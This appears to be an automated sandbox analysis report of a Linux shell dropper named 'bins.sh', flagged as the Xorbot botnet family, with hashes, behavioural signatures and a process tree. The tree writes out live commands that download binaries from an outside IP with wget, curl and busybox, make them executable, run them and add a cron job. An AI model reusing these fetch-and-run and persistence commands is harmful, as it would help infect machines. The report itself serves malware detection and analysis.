Analysis
-
max time kernel
149s -
max time network
152s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
11/12/2024, 15:12
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
5eab5295c0740b5344abb66f19ea0e39
-
SHA1
7796e56bc014459c40563c509569791a6f05341a
-
SHA256
b516438a84f4d4febdc19c62bae733ac24bf557205fd8ac1e42d1fb0f83f0d5a
-
SHA512
6922bb223cb1df386c64584feb519299b4e06ed94d6153a314e01a883ecfa5a608bfb4732e11dff85402cdc406fd1293db7914457c14f8024a54f87754afb4d4
-
SSDEEP
96:C//63ZCcEgN6L/vLIPnA43WlMf61Nx//63bZCcEgN8Lv7vLIPnlXXWTyYl6f81Na:dCcEg4BaWuf61PcEgVIQz
Malware Config
Signatures
-
resource yara_rule behavioral1/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (2210) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1502 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 1503 pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 -
Renames itself 1 IoCs
pid Process 1504 pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.QV1PCP crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/1654/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1663/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/84/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/329/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1007/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1541/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1556/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1648/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/7/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1087/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1332/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1601/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1610/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1721/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/588/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1558/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1589/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1111/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1579/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1563/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1691/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/161/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/166/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/535/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/153/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1229/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1684/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1667/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1705/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/471/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1150/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1155/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1531/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/18/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/164/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1169/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1671/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1676/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1724/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/24/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1664/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1670/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1533/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1559/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1616/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/4/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/11/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/28/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1097/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1522/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1584/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1710/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/17/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/406/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/559/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1159/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1527/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1546/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1662/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1680/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/157/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/434/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/916/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 File opened for reading /proc/1701/cmdline pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1492 curl 1493 busybox 1503 pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 1510 rm 1479 wget -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 wget File opened for modification /tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 curl File opened for modification /tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74 busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1477
-
/bin/rm/bin/rm bins.sh2⤵PID:1478
-
-
/usr/bin/wgetwget http://216.126.231.164/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf742⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1479
-
-
/usr/bin/curlcurl -O http://216.126.231.164/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf742⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1492
-
-
/bin/busybox/bin/busybox wget http://216.126.231.164/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf742⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1493
-
-
/bin/chmodchmod 777 pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf742⤵
- File and Directory Permissions Modification
PID:1502
-
-
/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74./pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf742⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
- System Network Configuration Discovery
PID:1503 -
/bin/shsh -c "crontab -l"3⤵PID:1505
-
/usr/bin/crontabcrontab -l4⤵PID:1506
-
-
-
/bin/shsh -c "crontab -"3⤵PID:1507
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1508
-
-
-
-
/bin/rmrm pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf742⤵
- System Network Configuration Discovery
PID:1510
-
-
/usr/bin/wgetwget http://216.126.231.164/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V2⤵PID:1513
-
-
/usr/bin/curlcurl -O http://216.126.231.164/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V2⤵PID:1514
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
210B
MD596cbb8b45261a9efa12581931a291204
SHA1c76e7433cde25b8b4774fb34d012fc92e81e1a6c
SHA2568ff9576d321e5736aa539a59b487c5b4485036523a09007cc27917e761afe8d9
SHA51253b6086ee4ecbc842d87ac0dd34406ddb51b024189c6b59021d52b17191dd5ae8f766ca34d863e4b48b7f67addd8f0fba049e4c3d00b1435fbb9f72e7b97e12e